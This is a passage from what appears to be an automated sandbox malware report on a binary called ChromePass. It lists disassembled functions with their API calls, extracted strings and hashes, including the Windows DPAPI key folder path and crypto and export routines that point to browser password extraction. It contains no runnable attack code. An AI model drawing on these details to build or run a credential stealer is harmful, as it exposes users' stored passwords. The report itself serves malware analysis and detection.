                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: 2e7af70ece1155b5e30b8fa81bec0d763625027daf0eb4b5469ea317d236c9cf
                                        • Instruction ID: fa52d7f1b1008cc69c615fc7342edfa9e29d8fd1c7b162c5b6278b3a8d89fcb7
                                        • Opcode Fuzzy Hash: 2e7af70ece1155b5e30b8fa81bec0d763625027daf0eb4b5469ea317d236c9cf
                                        • Instruction Fuzzy Hash: 0921C732500214EFEB21AF51EC89EAF3B65EF45710F41007AFA06A51D1DB789961CFAD
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: edc64a08c20b33aba1040eafddddcfefcd0923b02e7d2eb590546dcc5dc052ce
                                        • Instruction ID: 16cb55e7f91040512dc75ba1883eca596ef12c0a57738a0f4195a451921f21b5
                                        • Opcode Fuzzy Hash: edc64a08c20b33aba1040eafddddcfefcd0923b02e7d2eb590546dcc5dc052ce
                                        • Instruction Fuzzy Hash: 7321FE32504350ABC720CF55D885A9FB7E9FF84754F410A3FFA45A6281E7368A20CB9A
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • memset.MSVCRT ref: 004029E2
                                        • memset.MSVCRT ref: 004029F6
                                        • memset.MSVCRT ref: 00402A0A
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,00000414), ref: 00402A1A
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 00402A2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$AcquireContextCrypt
                                        • String ID: 6$\
                                        • API String ID: 208668350-1284684873
                                        • Opcode ID: 4ae6d09cf5ac4c9f5680b025e46bddb1b0075f4aaf80fe0043221d37ad413e65
                                        • Instruction ID: 0f4ecce006b6259caa9f2005d481d0c0c5787f0323d74ee6d6910b3726bfe70b
                                        • Opcode Fuzzy Hash: 4ae6d09cf5ac4c9f5680b025e46bddb1b0075f4aaf80fe0043221d37ad413e65
                                        • Instruction Fuzzy Hash: 1D219F7250012EAEDB22EE54DC85FEF3BADBF09304F0040BAB908E2042D6789A548F65
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040501E
                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080,?,?), ref: 0040504C
                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080,?,?), ref: 00405061
                                        • wcscpy.MSVCRT ref: 00405071
                                        • wcscat.MSVCRT ref: 0040507E
                                        • wcscat.MSVCRT ref: 0040508D
                                        • wcscpy.MSVCRT ref: 004050A1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                        • String ID:
                                        • API String ID: 1331804452-0
                                        • Opcode ID: bcf1390ad7f74156ae8b04afdeb0b4738fb1043f16cbd9194c0ece294b357243
                                        • Instruction ID: 355817c143a24c0a41ac53ccef820e561d99b574c250e2a2da21fdf295fd440c
                                        • Opcode Fuzzy Hash: bcf1390ad7f74156ae8b04afdeb0b4738fb1043f16cbd9194c0ece294b357243
                                        • Instruction Fuzzy Hash: DF11B6B2900128BFDB21AB50EC85EFF777CEB04304F44487BBA05A2051D2B899958EA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 00ee19d816f89cf8b905fb19bc228da781efd16ecb144870987b18c8766899a3
                                        • Instruction ID: 60f4b69dee50b3d091ac869881a6f292a5657bc2eb947e70e2e40d8e8ac2718b
                                        • Opcode Fuzzy Hash: 00ee19d816f89cf8b905fb19bc228da781efd16ecb144870987b18c8766899a3
                                        • Instruction Fuzzy Hash: 0901F572F003346AE7216615BC86BBB33A9EB44715F90006BFC14AA1C2E67CE9454ACA
                                        APIs
                                        • GetDlgItem.USER32(?,000003F3), ref: 00404151
                                        • LoadLibraryW.KERNEL32(shlwapi.dll), ref: 0040415E
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040416C
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040417F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeItemLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 963042594-1506664499
                                        • Opcode ID: cc1d2221f923288e56d1d85c3232f4a7380646f269b1f931d5630d8c804f0511
                                        • Instruction ID: 01acf26635d1cfce3d283dedcdd8a10d45ef81041fc001994a40c011f36b91fa
                                        • Opcode Fuzzy Hash: cc1d2221f923288e56d1d85c3232f4a7380646f269b1f931d5630d8c804f0511
                                        • Instruction Fuzzy Hash: 37E048717002317BD6212771ACCDD7F766DDF917957500437BA02E51B1CFB889928A18
                                        APIs
                                        Strings
                                        • BINARY, xrefs: 0042A9F9
                                        • unknown encoding, xrefs: 0042AA07
                                        • Unable to delete/modify collation sequence due to active statements, xrefs: 0042AA50
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: BINARY$Unable to delete/modify collation sequence due to active statements$unknown encoding
                                        • API String ID: 39653677-1766853119
                                        • Opcode ID: b7cffcdca24aecc4cd8aff73aa3209c3958a0fa5c1dff23795c8e3a2643926a5
                                        • Instruction ID: 0f18042846b3076d369a411df17496327afcce51f7d4b400c808bb306dccc812
                                        • Opcode Fuzzy Hash: b7cffcdca24aecc4cd8aff73aa3209c3958a0fa5c1dff23795c8e3a2643926a5
                                        • Instruction Fuzzy Hash: 8A315971300220AFDB255F29EC42BABBBA5DF00324F64851BFC149A282D779DD91C699
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: isdigit
                                        • String ID:
                                        • API String ID: 2326231117-0
                                        • Opcode ID: 1901b69677519f67451912c9592368bc0ad4f5fb940677d5fde9bea6b71fae16
                                        • Instruction ID: 83484cbb7398d2c2382e148c4f8f7a896e897c15591de59ac67ee15c4c6b4b55
                                        • Opcode Fuzzy Hash: 1901b69677519f67451912c9592368bc0ad4f5fb940677d5fde9bea6b71fae16
                                        • Instruction Fuzzy Hash: 6B21B162D482A19AEF3017F618803326BC84F76351F190AFFECD0E2A81E17C88C2165A
                                        APIs
                                        • memset.MSVCRT ref: 004089B8
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                          • Part of subcall function 004059FD: LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                          • Part of subcall function 004059FD: memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 004059FD: wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 004059FD: wcslen.MSVCRT ref: 00405A9C
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                          • Part of subcall function 00405365: memset.MSVCRT ref: 00405386
                                          • Part of subcall function 00405365: _snwprintf.MSVCRT ref: 004053B4
                                          • Part of subcall function 00405365: wcslen.MSVCRT ref: 004053C0
                                          • Part of subcall function 00405365: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 004053D8
                                          • Part of subcall function 00405365: wcslen.MSVCRT ref: 004053E6
                                          • Part of subcall function 00405365: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 004053F9
                                          • Part of subcall function 004051AA: wcscpy.MSVCRT ref: 00405210
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: 24c53f0340c22b77f7c47b08a15643e9465d2a9af67130d0efdf346d2cfa2e93
                                        • Instruction ID: 84affe95b08b9f600584db437cc8fe7d90b315df240b41990a1c8402c074e1b9
                                        • Opcode Fuzzy Hash: 24c53f0340c22b77f7c47b08a15643e9465d2a9af67130d0efdf346d2cfa2e93
                                        • Instruction Fuzzy Hash: 23212DB1D00759DBCB50DF99D881ADE7BB4FB04318F10417AE558B7241EB385A46CF98
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$wcscatwcscpy
                                        • String ID: AppData\Roaming\Microsoft\Protect$Application Data\Microsoft\Protect
                                        • API String ID: 295340062-36309976
                                        • Opcode ID: 9895488412633ed806c8772db13f093fd39d97af3cb3ae421cc36ee4f8e35c0e
                                        • Instruction ID: 2ef22bdbafb1d8894d50f593b003672d9059eec5658b22f5f0426db89dd930ae
                                        • Opcode Fuzzy Hash: 9895488412633ed806c8772db13f093fd39d97af3cb3ae421cc36ee4f8e35c0e
                                        • Instruction Fuzzy Hash: 3F012BB33042142AD3107B26ADC5AA973D9DF81726B60057FFD40E60C2EFBDA941815D
                                        APIs
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                        • memset.MSVCRT ref: 004078AB
                                          • Part of subcall function 0040AAE5: memcpy.MSVCRT(?,<,00000008,?,?,00000000,004078CC,?,?), ref: 0040AB62
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 004078F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: d440415f155090d75d789f600a398a7556cb988a9e158da0a98f77aa85ee3b2c
                                        • Instruction ID: e095093e16e3ceeaa7e9ea9200a2abc427f8573690bfedeb410235e0cb9c8907
                                        • Opcode Fuzzy Hash: d440415f155090d75d789f600a398a7556cb988a9e158da0a98f77aa85ee3b2c
                                        • Instruction Fuzzy Hash: 0111BF32A00715BFDB10AF61EC82E9A7B66FF04318F10402AF904265A2C739F960CBC8
                                        APIs
                                        • memset.MSVCRT ref: 00407A73
                                        • memset.MSVCRT ref: 00407A8A
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 00407AC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" ?>
                                        • API String ID: 168708657-3296998653
                                        • Opcode ID: dc248ede9b9b93bc8a09d13e098aaa581637d56c3575a5626b05814e7271e46a
                                        • Instruction ID: a7dd0036f4669b490196cfc870af23aad45e3806ab696487d408a2c478166364
                                        • Opcode Fuzzy Hash: dc248ede9b9b93bc8a09d13e098aaa581637d56c3575a5626b05814e7271e46a
                                        • Instruction Fuzzy Hash: C201D8B2E0012967D720A751DC46FEA766EEF40308F4000B67F08B6091D778DA558698
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: dff395dbf71922a9d6890ca3d12c6ce5f466b0e16580e663594afad01ea92c52
                                        • Instruction ID: a06d71eb03b053c5f46cc024e6edb27df811283a0976cd713272c2079fcf5c70
                                        • Opcode Fuzzy Hash: dff395dbf71922a9d6890ca3d12c6ce5f466b0e16580e663594afad01ea92c52
                                        • Instruction Fuzzy Hash: 1BF0AEB664021867CB11A794DC46FDE73ACFB44785F5400A7BA04B3141DBB49A454AB9
                                        APIs
                                        • LockFile.KERNEL32(00000000,40000000,00000000,00000001,00000000), ref: 0040D101
                                        • Sleep.KERNEL32(00000001), ref: 0040D10B
                                        • LockFile.KERNEL32(00000000,40000001,00000000,00000001,00000000), ref: 0040D14D
                                        • LockFile.KERNEL32(00000000,40000002,00000000,000001FE,00000000), ref: 0040D187
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileLock$Sleep
                                        • String ID:
                                        • API String ID: 2837005644-0
                                        • Opcode ID: 59e48f5a8ecbc93c10ecf98034fdb6630a6d4af4ba3888f978c1a95b5dc2fc7b
                                        • Instruction ID: 71930969913137a4b18d29947e3b921dae6dfd5bf9e445a70e1e275211a53b2c
                                        • Opcode Fuzzy Hash: 59e48f5a8ecbc93c10ecf98034fdb6630a6d4af4ba3888f978c1a95b5dc2fc7b
                                        • Instruction Fuzzy Hash: 6931C731900304BADB314F95CD41BABB7A2AF80758F24C03AF9197E2C5CB79D9499B18
                                        APIs
                                        • memset.MSVCRT ref: 0040919C
                                          • Part of subcall function 004050AE: ShellExecuteW.SHELL32(?,open,?,0042C47C,0042C47C,00000005), ref: 004050C4
                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004091E0
                                        • GetMenuStringW.USER32(?,?,?,0000004F,00000000), ref: 004091FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ExecuteMenuMessageSendShellStringmemset
                                        • String ID: hAC
                                        • API String ID: 3150464542-3207736804
                                        • Opcode ID: ad9735bd10d2f274383b41e9f76874b314708e3bce80cdfd8b1d45439aa6a5f9
                                        • Instruction ID: 9f503a3996ee50f980d5cdaaa83e340c66ad355af15459912377805262b10128
                                        • Opcode Fuzzy Hash: ad9735bd10d2f274383b41e9f76874b314708e3bce80cdfd8b1d45439aa6a5f9
                                        • Instruction Fuzzy Hash: CB31E671600705EFDB309F64C888A9AB3A9BF10365F1086BEE165672E2C778AD85CB54
                                        APIs
                                        • memset.MSVCRT ref: 00407B07
                                        • memset.MSVCRT ref: 00407B1E
                                          • Part of subcall function 00407185: wcscpy.MSVCRT ref: 0040718A
                                          • Part of subcall function 00407185: _wcslwr.MSVCRT ref: 004071AB
                                        • _snwprintf.MSVCRT ref: 00407B4D
                                          • Part of subcall function 00404870: wcslen.MSVCRT ref: 0040487D
                                          • Part of subcall function 00404870: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040788B,?,<item>), ref: 0040488C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        • Opcode ID: b01b050d2b987f9521d46d26e93afce8b1bfe3bfa3c84535e891efa3c33f00e1
                                        • Instruction ID: 073a195abd97e505d0c44f18f087f8bafc3a7e879dc48580ce391312ff5c1156
                                        • Opcode Fuzzy Hash: b01b050d2b987f9521d46d26e93afce8b1bfe3bfa3c84535e891efa3c33f00e1
                                        • Instruction Fuzzy Hash: 4301D6B3E0012967D720A755DC45FEA776EEF41308F4000B6BF08B7082DB78AA558A99
                                        APIs
                                          • Part of subcall function 00404BE5: memset.MSVCRT ref: 00404BEF
                                          • Part of subcall function 00404BE5: wcscpy.MSVCRT ref: 00404C2F
                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        • Opcode ID: fec4c3f488b20ed5bdc66d84dd021dc12000734a1329bc5c35b2600b853bb3fa
                                        • Instruction ID: 0cbfb8aef047944f7db3e0eccab611112fe21e3d273e6c9f0c641645f9b3b621
                                        • Opcode Fuzzy Hash: fec4c3f488b20ed5bdc66d84dd021dc12000734a1329bc5c35b2600b853bb3fa
                                        • Instruction Fuzzy Hash: 3BF08275B40308B7E6317BE1DC86F5A77B9AB40B04F500429B755BA1E0D6B4B142D658
                                        APIs
                                        • LoadLibraryW.KERNEL32(shell32.dll,0040A928,?), ref: 0040A8F8
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040A90D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
